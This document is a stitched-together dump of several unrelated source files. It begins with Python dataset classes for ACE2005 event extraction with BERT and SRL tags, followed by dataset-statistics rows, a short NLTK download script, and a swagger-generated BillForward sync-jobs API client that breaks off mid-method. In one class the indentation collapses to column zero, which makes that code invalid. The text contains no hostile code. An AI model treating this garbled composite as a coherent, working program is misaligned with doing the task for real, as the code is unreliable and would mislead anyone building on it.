                    self.entities_li.append([[PAD]] + entities + [[PAD]])
                    self.postags_li.append([PAD] + postags + [PAD])
                    self.triggers_li.append(triggers)
                    self.arguments_li.append(arguments)
                    self.srl_arguments_li.append(srl_arguments)
                    self.srl_triggers_li.append(srl_triggers_single_seq)
        # optional subsetting, e.g. for few-shot episode construction
        if indices:
            new_sent_li = [self.sent_li[index] for index in indices]
            new_entities_li = [self.entities_li[index] for index in indices]
            new_postags_li = [self.postags_li[index] for index in indices]
            new_triggers_li = [self.triggers_li[index] for index in indices]
            new_arguments_li = [self.arguments_li[index] for index in indices]
            new_srl_arguments_li = [self.srl_arguments_li[index] for index in indices]
            new_srl_triggers_li = [self.srl_triggers_li[index] for index in indices]
            self.sent_li = new_sent_li
            self.entities_li = new_entities_li
            self.postags_li = new_postags_li
            self.triggers_li = new_triggers_li
            self.arguments_li = new_arguments_li
            self.srl_arguments_li = new_srl_arguments_li
            self.srl_triggers_li = new_srl_triggers_li

    def __len__(self):
        """Number of loaded sentences."""
        return len(self.sent_li)

    def __getitem__(self, idx):
        """Return one sentence as BERT-ready id sequences plus annotations."""
        words, entities, postags, triggers, arguments, srl_arguments, srl_triggers_single_seq = self.sent_li[idx], self.entities_li[idx], self.postags_li[idx], self.triggers_li[idx], self.arguments_li[idx], self.srl_arguments_li[idx], self.srl_triggers_li[idx]
        # We give credits only to the first piece.
        tokens_x, entities_x, postags_x, is_heads = [], [], [], []
        for w, e, p in zip(words, entities, postags):
            tokens = tokenizer.tokenize(w) if w not in [CLS, SEP] else [w]
            tokens_xx = tokenizer.convert_tokens_to_ids(tokens)
            if w in [CLS, SEP]:
                is_head = [0]
            else:
                # only the first wordpiece of a word is a "head"
                is_head = [1] + [0] * (len(tokens) - 1)
            p = [p] + [PAD] * (len(tokens) - 1)
            e = [e] + [[PAD]] * (len(tokens) - 1)  # <PAD>: no decision
            p = [postag2idx[postag] for postag in p]
            e = [[entity2idx[entity] for entity in entities] for entities in e]
            tokens_x.extend(tokens_xx), postags_x.extend(p), entities_x.extend(e), is_heads.extend(is_head)
        triggers_y = [trigger2idx[t] for t in triggers]
        # convert srl tag to index; 'V' (predicate) tags are mapped to NONE here
        new_srl = copy.deepcopy(srl_triggers_single_seq)
        for i, item in enumerate(srl_triggers_single_seq):
            for j, tag in enumerate(item):
                if tag!='V':
                    new_srl[i][j] = srl2idx[tag]
                else:
                    new_srl[i][j] = srl2idx[NONE]
                # new_srl[i][j] = srl2idx[tag]
        # positions of head wordpieces, used to recover word-level predictions
        head_indexes = []
        for i in range(len(is_heads)):
            if is_heads[i]:
                head_indexes.append(i)
        seqlen = len(tokens_x)
        return tokens_x, entities_x, postags_x, triggers_y, arguments, seqlen, head_indexes, words, triggers, srl_arguments, new_srl

    def get_samples_weight(self):
        """Per-sample weights: 5.0 for sentences with at least one trigger, 1.0 otherwise."""
        samples_weight = []
        for triggers in self.triggers_li:
            not_none = False
            for trigger in triggers:
                if trigger != NONE:
                    not_none = True
                    break
            if not_none:
                samples_weight.append(5.0)
            else:
                samples_weight.append(1.0)
        return np.array(samples_weight)
class ACE2005DatasetBase(data.Dataset):
def __init__(self, fpath, all_arguments, argument2idx, fpath_mix=None, indices=None, base_event=None):
self.sent_li, self.entities_li, self.postags_li, self.triggers_li, self.arguments_li, self.srl_arguments_li, self.srl_triggers_li = [], [], [], [], [], [], []
if fpath_mix:
fpath_list = [fpath, fpath_mix]
else:
fpath_list = [fpath]
for _fpath in fpath_list:
with open(_fpath, 'r') as f:
data = json.load(f)
for item in data:
words = item['words']
entities = [[NONE] for _ in range(len(words))]
triggers = [NONE] * len(words)
postags = item['pos-tags']
arguments = {
'candidates': [
# ex. (5, 6, "entity_type_str"), ...
],
'events': {
# ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
},
}
srl_arguments = {
'candidates': [
# ex. (5, 6, "entity_type_str"), ...
],
'events': {
# ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
},
}
srl_triggers_single_seq = [] # ex. [[verb1_srl_tag1, ..., verb1_srl_tagn],[verb2_srl_tag1, ..., verb2_srl_tagn],...]
base_flag = True
for entity_mention in item['golden-entity-mentions']:
arguments['candidates'].append((entity_mention['start'], entity_mention['end'], entity_mention['entity-type']))
for i in range(entity_mention['start'], entity_mention['end']):
entity_type = entity_mention['entity-type']
if i == entity_mention['start']:
entity_type = 'B-{}'.format(entity_type)
else:
entity_type = 'I-{}'.format(entity_type)
if len(entities[i]) == 1 and entities[i][0] == NONE:
entities[i][0] = entity_type
else:
entities[i].append(entity_type)
for event_mention in item['golden-event-mentions']:
for i in range(event_mention['trigger']['start'], event_mention['trigger']['end']):
trigger_type = event_mention['event_type']
if trigger_type not in base_event:
base_flag = False
if i == event_mention['trigger']['start']:
triggers[i] = 'B-{}'.format(trigger_type)
else:
triggers[i] = 'I-{}'.format(trigger_type)
event_key = (event_mention['trigger']['start'], event_mention['trigger']['end'], event_mention['event_type'])
arguments['events'][event_key] = []
for argument in event_mention['arguments']:
role = argument['role']
if role.startswith('Time'):
role = role.split('-')[0]
if role in all_arguments:
arguments['events'][event_key].append((argument['start'], argument['end'], argument2idx[role]))
for srl_item in item['srl']:
srl_trigger_start, srl_trigger_end = srl_find_trigger(srl_item['tags'])
if srl_trigger_start != None:
event_key = (srl_trigger_start, srl_trigger_end, srl_item['verb'])
argument_list = srl_find_argument(srl_item['tags'])
srl_arguments['events'][event_key] = []
for argument in argument_list:
srl_arguments['events'][event_key].append(argument)
for srl_item in item['srl']:
srl_triggers = []
for tag in srl_item['tags']:
# split the BI tag and the CR middle tag
tag = srl_split_role(tag)
srl_triggers.append(tag)
srl_triggers_single_seq.append(srl_triggers)
if srl_triggers_single_seq==[]:
srl_triggers_single_seq=[[]] # reshape
if base_flag:
self.sent_li.append([CLS] + words + [SEP])
self.entities_li.append([[PAD]] + entities + [[PAD]])
self.postags_li.append([PAD] + postags + [PAD])
self.triggers_li.append(triggers)
self.arguments_li.append(arguments)
self.srl_arguments_li.append(srl_arguments)
self.srl_triggers_li.append(srl_triggers_single_seq)
if indices:
new_sent_li = [self.sent_li[index] for index in indices]
new_entities_li = [self.entities_li[index] for index in indices]
new_postags_li = [self.postags_li[index] for index in indices]
new_triggers_li = [self.triggers_li[index] for index in indices]
new_arguments_li = [self.arguments_li[index] for index in indices]
new_srl_arguments_li = [self.srl_arguments_li[index] for index in indices]
new_srl_triggers_li = [self.srl_triggers_li[index] for index in indices]
self.sent_li = new_sent_li
self.entities_li = new_entities_li
self.postags_li = new_postags_li
self.triggers_li = new_triggers_li
self.arguments_li = new_arguments_li
self.srl_arguments_li = new_srl_arguments_li
self.srl_triggers_li = new_srl_triggers_li
def __len__(self):
    """Return the number of stored (CLS/SEP-wrapped) sentences in the dataset."""
    return len(self.sent_li)
def __getitem__(self, idx):
    """Return the idx-th sentence wordpiece-tokenized, with every label sequence indexed.

    Produces (tokens_x, entities_x, postags_x, triggers_y, arguments, seqlen,
    head_indexes, words, triggers, srl_arguments, new_srl); labels are kept
    word-aligned by padding the non-head wordpieces with PAD.
    """
    words = self.sent_li[idx]
    entities = self.entities_li[idx]
    postags = self.postags_li[idx]
    triggers = self.triggers_li[idx]
    arguments = self.arguments_li[idx]
    srl_arguments = self.srl_arguments_li[idx]
    srl_triggers_single_seq = self.srl_triggers_li[idx]

    # Only the first wordpiece of each word counts as a "head"; CLS/SEP get 0.
    tokens_x, entities_x, postags_x, is_heads = [], [], [], []
    for word, entity_tags, postag in zip(words, entities, postags):
        if word in [CLS, SEP]:
            pieces = [word]
            heads = [0]
        else:
            pieces = tokenizer.tokenize(word)
            heads = [1] + [0] * (len(pieces) - 1)
        piece_ids = tokenizer.convert_tokens_to_ids(pieces)
        padded_postags = [postag] + [PAD] * (len(pieces) - 1)
        padded_entities = [entity_tags] + [[PAD]] * (len(pieces) - 1)  # <PAD>: no decision
        tokens_x.extend(piece_ids)
        postags_x.extend(postag2idx[tag] for tag in padded_postags)
        entities_x.extend([entity2idx[tag] for tag in tags] for tags in padded_entities)
        is_heads.extend(heads)

    triggers_y = [trigger2idx[tag] for tag in triggers]
    # Convert each verb's SRL tag sequence into index form.
    new_srl = [[srl2idx[tag] for tag in tag_seq] for tag_seq in srl_triggers_single_seq]
    head_indexes = [position for position, flag in enumerate(is_heads) if flag]
    seqlen = len(tokens_x)
    return tokens_x, entities_x, postags_x, triggers_y, arguments, seqlen, head_indexes, words, triggers, srl_arguments, new_srl
def get_samples_weight(self):
    """Return per-sentence sampling weights for a weighted sampler.

    A sentence containing at least one non-NONE trigger tag is upweighted
    to 5.0; trigger-less sentences get weight 1.0.

    :return: numpy float array, one weight per stored sentence.
    """
    # `any` short-circuits at the first real trigger, matching the original
    # flag-and-break loop.
    samples_weight = [
        5.0 if any(trigger != NONE for trigger in triggers) else 1.0
        for triggers in self.triggers_li
    ]
    return np.array(samples_weight)
class ACE2005DatasetNovel(data.Dataset):
    """ACE2005-style dataset restricted to "novel" (few-shot) event types.

    Only sentences containing at least one event type from ``novel_event``
    are kept, and the number of sentences collected per novel type is
    bounded by ``novel_shot``.
    """

    def __init__(self, fpath, all_arguments, argument2idx, fpath_mix=None, indices=None, novel_event=None, novel_shot=5):
        """Load novel-event sentences from one (or two, if mixing) JSON files.

        :param fpath: primary ACE-style JSON file.
        :param all_arguments: argument roles to keep.
        :param argument2idx: mapping from argument role to index.
        :param fpath_mix: optional second JSON file mixed into the pool.
        :param indices: optional index list used to subsample the result.
        :param novel_event: event types treated as novel; None/empty yields
            an empty dataset.
        :param novel_shot: max sentences kept per novel event type.
        """
        self.sent_li, self.entities_li, self.postags_li, self.triggers_li, self.arguments_li, self.srl_arguments_li, self.srl_triggers_li = [], [], [], [], [], [], []
        if fpath_mix:
            fpath_list = [fpath, fpath_mix]
        else:
            fpath_list = [fpath]
        # Fix: the default novel_event=None crashed the dict comprehension
        # with a TypeError; treat None as "no novel events".
        if novel_event is None:
            novel_event = []
        novel_event_count = {item: 0 for item in novel_event}
        for _fpath in fpath_list:
            with open(_fpath, 'r') as f:
                data = json.load(f)
            for item in data:
                words = item['words']
                entities = [[NONE] for _ in range(len(words))]
                triggers = [NONE] * len(words)
                postags = item['pos-tags']
                arguments = {
                    'candidates': [
                        # ex. (5, 6, "entity_type_str"), ...
                    ],
                    'events': {
                        # ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
                    },
                }
                srl_arguments = {
                    'candidates': [
                        # ex. (5, 6, "entity_type_str"), ...
                    ],
                    'events': {
                        # ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
                    },
                }
                srl_triggers_single_seq = []  # ex. [[verb1_srl_tag1, ..., verb1_srl_tagn], [verb2_srl_tag1, ...], ...]
                novel_flag = False
                temp_novel_event = []  # novel event types seen in this data item
                for entity_mention in item['golden-entity-mentions']:
                    arguments['candidates'].append((entity_mention['start'], entity_mention['end'], entity_mention['entity-type']))
                    for i in range(entity_mention['start'], entity_mention['end']):
                        entity_type = entity_mention['entity-type']
                        if i == entity_mention['start']:
                            entity_type = 'B-{}'.format(entity_type)
                        else:
                            entity_type = 'I-{}'.format(entity_type)
                        # Tokens may carry several entity tags; replace the NONE
                        # placeholder on first use, append afterwards.
                        if len(entities[i]) == 1 and entities[i][0] == NONE:
                            entities[i][0] = entity_type
                        else:
                            entities[i].append(entity_type)
                for event_mention in item['golden-event-mentions']:
                    for i in range(event_mention['trigger']['start'], event_mention['trigger']['end']):
                        trigger_type = event_mention['event_type']
                        if i == event_mention['trigger']['start']:
                            triggers[i] = 'B-{}'.format(trigger_type)
                        else:
                            triggers[i] = 'I-{}'.format(trigger_type)
                        if trigger_type in novel_event:
                            novel_flag = True
                            temp_novel_event.append(trigger_type)
                    event_key = (event_mention['trigger']['start'], event_mention['trigger']['end'], event_mention['event_type'])
                    arguments['events'][event_key] = []
                    for argument in event_mention['arguments']:
                        role = argument['role']
                        if role.startswith('Time'):
                            role = role.split('-')[0]  # collapse e.g. "Time-Within" into "Time"
                        if role in all_arguments:
                            arguments['events'][event_key].append((argument['start'], argument['end'], argument2idx[role]))
                for srl_item in item['srl']:
                    srl_trigger_start, srl_trigger_end = srl_find_trigger(srl_item['tags'])
                    if srl_trigger_start is not None:
                        event_key = (srl_trigger_start, srl_trigger_end, srl_item['verb'])
                        argument_list = srl_find_argument(srl_item['tags'])
                        srl_arguments['events'][event_key] = []
                        for argument in argument_list:
                            srl_arguments['events'][event_key].append(argument)
                for srl_item in item['srl']:
                    srl_triggers = []
                    for tag in srl_item['tags']:
                        # split the BI tag and the C-/R- middle tag
                        tag = srl_split_role(tag)
                        srl_triggers.append(tag)
                    srl_triggers_single_seq.append(srl_triggers)
                if srl_triggers_single_seq == []:
                    srl_triggers_single_seq = [[]]  # keep a rectangular shape for downstream padding
                if novel_flag:
                    # Keep the sentence while any of its novel event types is
                    # still under the per-type shot budget.
                    # NOTE(review): a sentence with several under-budget novel
                    # types is appended once per qualifying type — presumably
                    # deliberate oversampling; confirm against the training code.
                    for key, value in novel_event_count.items():
                        if int(value) < novel_shot and key in set(temp_novel_event):
                            self.sent_li.append([CLS] + words + [SEP])
                            self.entities_li.append([[PAD]] + entities + [[PAD]])
                            self.postags_li.append([PAD] + postags + [PAD])
                            self.triggers_li.append(triggers)
                            self.arguments_li.append(arguments)
                            self.srl_arguments_li.append(srl_arguments)
                            self.srl_triggers_li.append(srl_triggers_single_seq)
                            for temp_novel_event_item in set(temp_novel_event):
                                novel_event_count[temp_novel_event_item] += 1
        if indices:
            # Subsample every parallel list with the same index order.
            new_sent_li = [self.sent_li[index] for index in indices]
            new_entities_li = [self.entities_li[index] for index in indices]
            new_postags_li = [self.postags_li[index] for index in indices]
            new_triggers_li = [self.triggers_li[index] for index in indices]
            new_arguments_li = [self.arguments_li[index] for index in indices]
            new_srl_arguments_li = [self.srl_arguments_li[index] for index in indices]
            new_srl_triggers_li = [self.srl_triggers_li[index] for index in indices]
            self.sent_li = new_sent_li
            self.entities_li = new_entities_li
            self.postags_li = new_postags_li
            self.triggers_li = new_triggers_li
            self.arguments_li = new_arguments_li
            self.srl_arguments_li = new_srl_arguments_li
            self.srl_triggers_li = new_srl_triggers_li

    def __len__(self):
        """Return the number of stored sentences."""
        return len(self.sent_li)

    def __getitem__(self, idx):
        """Return the idx-th sentence wordpiece-tokenized, with label sequences indexed."""
        words, entities, postags, triggers, arguments, srl_arguments, srl_triggers_single_seq = self.sent_li[idx], self.entities_li[idx], self.postags_li[idx], self.triggers_li[idx], self.arguments_li[idx], self.srl_arguments_li[idx], self.srl_triggers_li[idx]
        # We give credits only to the first piece of each word.
        tokens_x, entities_x, postags_x, is_heads = [], [], [], []
        for w, e, p in zip(words, entities, postags):
            tokens = tokenizer.tokenize(w) if w not in [CLS, SEP] else [w]
            tokens_xx = tokenizer.convert_tokens_to_ids(tokens)
            if w in [CLS, SEP]:
                is_head = [0]
            else:
                is_head = [1] + [0] * (len(tokens) - 1)
            # Pad the word-level labels out to the wordpiece length.
            p = [p] + [PAD] * (len(tokens) - 1)
            e = [e] + [[PAD]] * (len(tokens) - 1)  # <PAD>: no decision
            p = [postag2idx[postag] for postag in p]
            e = [[entity2idx[entity] for entity in entities] for entities in e]
            tokens_x.extend(tokens_xx), postags_x.extend(p), entities_x.extend(e), is_heads.extend(is_head)
        triggers_y = [trigger2idx[t] for t in triggers]
        # Convert each verb's SRL tag sequence to indices.
        new_srl = [[srl2idx[tag] for tag in tag_seq] for tag_seq in srl_triggers_single_seq]
        head_indexes = [i for i in range(len(is_heads)) if is_heads[i]]
        seqlen = len(tokens_x)
        return tokens_x, entities_x, postags_x, triggers_y, arguments, seqlen, head_indexes, words, triggers, srl_arguments, new_srl

    def get_samples_weight(self):
        """Per-sentence sampling weights: 5.0 for sentences with any trigger, else 1.0."""
        samples_weight = [
            5.0 if any(trigger != NONE for trigger in triggers) else 1.0
            for triggers in self.triggers_li
        ]
        return np.array(samples_weight)
def pad(batch):
    """Collate function: right-pad every per-sample sequence to the batch max length.

    :param batch: list of 11-tuples as produced by the datasets' __getitem__.
    :return: the same 11 fields, transposed to batch-major lists; token ids,
        POS ids and head indexes padded with 0, trigger labels with
        trigger2idx[PAD], entity labels with [entity2idx[PAD]], and each SRL
        tag sequence with srl2idx[PAD].
    """
    tokens_x_2d, entities_x_3d, postags_x_2d, triggers_y_2d, arguments_2d, seqlens_1d, head_indexes_2d, words_2d, triggers_2d, srl_arg_2d, srl_triggers_2d = list(map(list, zip(*batch)))
    # Plain max() suffices; building a numpy array just to take its max was wasteful.
    maxlen = max(seqlens_1d)
    for i in range(len(tokens_x_2d)):
        tokens_x_2d[i] = tokens_x_2d[i] + [0] * (maxlen - len(tokens_x_2d[i]))
        postags_x_2d[i] = postags_x_2d[i] + [0] * (maxlen - len(postags_x_2d[i]))
        head_indexes_2d[i] = head_indexes_2d[i] + [0] * (maxlen - len(head_indexes_2d[i]))
        triggers_y_2d[i] = triggers_y_2d[i] + [trigger2idx[PAD]] * (maxlen - len(triggers_y_2d[i]))
        entities_x_3d[i] = entities_x_3d[i] + [[entity2idx[PAD]] for _ in range(maxlen - len(entities_x_3d[i]))]
        # Pad every verb's SRL tag sequence for this sample as well.
        for j, item in enumerate(srl_triggers_2d[i]):
            srl_triggers_2d[i][j] = item + [srl2idx[PAD]] * (maxlen - len(item))
    return tokens_x_2d, entities_x_3d, postags_x_2d, \
           triggers_y_2d, arguments_2d, \
           seqlens_1d, head_indexes_2d, \
           words_2d, triggers_2d, srl_arg_2d, srl_triggers_2d
| 49.712042
| 260
| 0.516588
| 3,169
| 28,485
| 4.354055
| 0.059325
| 0.046239
| 0.02957
| 0.034788
| 0.890999
| 0.882592
| 0.875344
| 0.87346
| 0.87346
| 0.87346
| 0
| 0.010974
| 0.376198
| 28,485
| 572
| 261
| 49.798951
| 0.765547
| 0.062349
| 0
| 0.857461
| 0
| 0
| 0.035031
| 0.004838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028953
| false
| 0
| 0.017817
| 0.006682
| 0.075724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c148c748dd17409ef1adae6bc9b10067a8f1d2f9
| 104
|
py
|
Python
|
initiate.py
|
AeshanaShalindra/Smart_questionnaire_NLP
|
222344b9696b101906bdce1b3678fcb3d6eb7b14
|
[
"MIT"
] | 3
|
2018-09-22T16:59:36.000Z
|
2018-12-06T09:46:14.000Z
|
initiate.py
|
AeshanaShalindra/Smart_questionnaire_NLP
|
222344b9696b101906bdce1b3678fcb3d6eb7b14
|
[
"MIT"
] | null | null | null |
initiate.py
|
AeshanaShalindra/Smart_questionnaire_NLP
|
222344b9696b101906bdce1b3678fcb3d6eb7b14
|
[
"MIT"
] | null | null | null |
# One-time NLTK resource setup: fetch the corpora this script depends on.
import nltk
nltk.download('wordnet')  # first-time use only
nltk.download('punkt')  # first-time use only
| 26
| 46
| 0.75
| 16
| 104
| 4.875
| 0.5625
| 0.307692
| 0.307692
| 0.410256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 104
| 3
| 47
| 34.666667
| 0.847826
| 0.375
| 0
| 0
| 0
| 0
| 0.193548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c18ded3f1ef2ac14ec4c90477f178bf948f5a2f7
| 39,575
|
py
|
Python
|
billforward/apis/synch_jobs_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | 2
|
2016-11-23T17:32:37.000Z
|
2022-02-24T05:13:20.000Z
|
billforward/apis/synch_jobs_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | null | null | null |
billforward/apis/synch_jobs_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | 1
|
2016-12-30T20:02:48.000Z
|
2016-12-30T20:02:48.000Z
|
# coding: utf-8
"""
BillForward REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class SynchJobsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind this API to an ApiClient, defaulting to the shared client.

    :param api_client: explicit client to use; when omitted (or falsy) the
        global Configuration's client is used, creating it on first access.
    """
    config = Configuration()
    if not api_client:
        # Lazily create the process-wide default client on first use.
        if not config.api_client:
            config.api_client = ApiClient()
        api_client = config.api_client
    self.api_client = api_client
def create_sync_job(self, synch_job, **kwargs):
    """
    Create a synch job.
    {\"nickname\":\"Create a new sync job\",\"request\":\"createSynchJobRequest.html\",\"response\":\"createSynchJobResponse.html\"}
    Convenience wrapper around `create_sync_job_with_http_info` that returns
    only the response data.  Supplying a `callback` keyword makes the HTTP
    request asynchronous, in which case the request thread is returned.
    :param callback function: The callback function for asynchronous request. (optional)
    :param MutableBillingEntity synch_job: The data synch job object to be created. (required)
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously, returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the same *_with_http_info
    # call, which already yields the data (or the thread when a callback
    # is present) — so a single return covers both original branches.
    return self.create_sync_job_with_http_info(synch_job, **kwargs)
def create_sync_job_with_http_info(self, synch_job, **kwargs):
    """
    Create a synch job.
    {\"nickname\":\"Create a new sync job\",\"request\":\"createSynchJobRequest.html\",\"response\":\"createSynchJobResponse.html\"}
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.create_sync_job_with_http_info(synch_job, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param MutableBillingEntity synch_job: The data synch job object to be created. (required)
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    # Auto-generated by swagger-codegen; edits here diverge from the spec.
    all_params = ['synch_job']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `locals()` snapshots the declared parameters; unknown kwargs are
    # rejected, known ones merged in, then the raw kwargs dict dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_sync_job" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'synch_job' is set
    if ('synch_job' not in params) or (params['synch_job'] is None):
        raise ValueError("Missing the required parameter `synch_job` when calling `create_sync_job`")

    resource_path = '/synchJobs'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}

    # The synch job entity travels as the request body.
    body_params = None
    if 'synch_job' in params:
        body_params = params['synch_job']

    # HTTP header `Accept` (dropped again if negotiation yields nothing)
    header_params['Accept'] = self.api_client.\
        select_header_accept(['text/xml', 'application/xml', 'application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = []

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DataSynchronizationJobPagedMetadata',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def get_all_sync_jobs(self, **kwargs):
    """
    Returns a collection of Users. By default 10 values are returned. Records are returned in natural order.
    {\"nickname\":\"Get all synch jobs\",\"response\":\"getSynchJobsAll.html\"}
    Convenience wrapper around `get_all_sync_jobs_with_http_info` that returns
    only the response data.  Supplying a `callback` keyword makes the HTTP
    request asynchronous, in which case the request thread is returned.
    :param callback function: The callback function for asynchronous request. (optional)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :param int offset: The offset from the first synch job to return.
    :param int records: The maximum number of synch jobs to return.
    :param str order_by: Specify a field used to order the result set.
    :param str order: Ihe direction of any ordering, either ASC or DESC.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously, returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both returned the same delegated call; collapsed.
    return self.get_all_sync_jobs_with_http_info(**kwargs)
def get_all_sync_jobs_with_http_info(self, **kwargs):
    """
    Returns a collection of Users. By default 10 values are returned. Records are returned in natural order.
    {\"nickname\":\"Get all synch jobs\",\"response\":\"getSynchJobsAll.html\"}
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_all_sync_jobs_with_http_info(callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
    :param int offset: The offset from the first synch job to return.
    :param int records: The maximum number of synch jobs to return.
    :param str order_by: Specify a field used to order the result set.
    :param str order: Ihe direction of any ordering, either ASC or DESC.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    # Auto-generated by swagger-codegen; edits here diverge from the spec.
    all_params = ['organizations', 'offset', 'records', 'order_by', 'order']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `locals()` snapshots the declared parameters; unknown kwargs are
    # rejected, known ones merged in, then the raw kwargs dict dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_all_sync_jobs" % key
            )
        params[key] = val
    del params['kwargs']

    resource_path = '/synchJobs'.replace('{format}', 'json')
    path_params = {}

    # Only the paging/ordering options actually supplied become query params.
    query_params = {}
    if 'organizations' in params:
        query_params['organizations'] = params['organizations']
    if 'offset' in params:
        query_params['offset'] = params['offset']
    if 'records' in params:
        query_params['records'] = params['records']
    if 'order_by' in params:
        query_params['order_by'] = params['order_by']
    if 'order' in params:
        query_params['order'] = params['order']

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept` (dropped again if negotiation yields nothing)
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = []

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DataSynchronizationJobPagedMetadata',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_id(self, synch_job_id, **kwargs):
    """
    Returns a single job, specified by the ID parameter.
    {\"nickname\":\"Retrieve an existing synch job\",\"response\":\"getSyncJobByID.html\"}
    Convenience wrapper around `get_sync_job_by_id_with_http_info` that returns
    only the response data.  Supplying a `callback` keyword makes the HTTP
    request asynchronous, in which case the request thread is returned.
    :param callback function: The callback function for asynchronous request. (optional)
    :param str synch_job_id: ID of the Sync Job. (required)
    :param list[str] organizations: A list of organization -IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously, returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both returned the same delegated call; collapsed.
    return self.get_sync_job_by_id_with_http_info(synch_job_id, **kwargs)
def get_sync_job_by_id_with_http_info(self, synch_job_id, **kwargs):
    """
    Returns a single job, specified by the ID parameter.
    {\"nickname\":\"Retrieve an existing synch job\",\"response\":\"getSyncJobByID.html\"}
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_sync_job_by_id_with_http_info(synch_job_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str synch_job_id: ID of the Sync Job. (required)
    :param list[str] organizations: A list of organization -IDs used to restrict the scope of API calls.
    :return: DataSynchronizationJobPagedMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    # Auto-generated by swagger-codegen; edits here diverge from the spec.
    all_params = ['synch_job_id', 'organizations']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `locals()` snapshots the declared parameters; unknown kwargs are
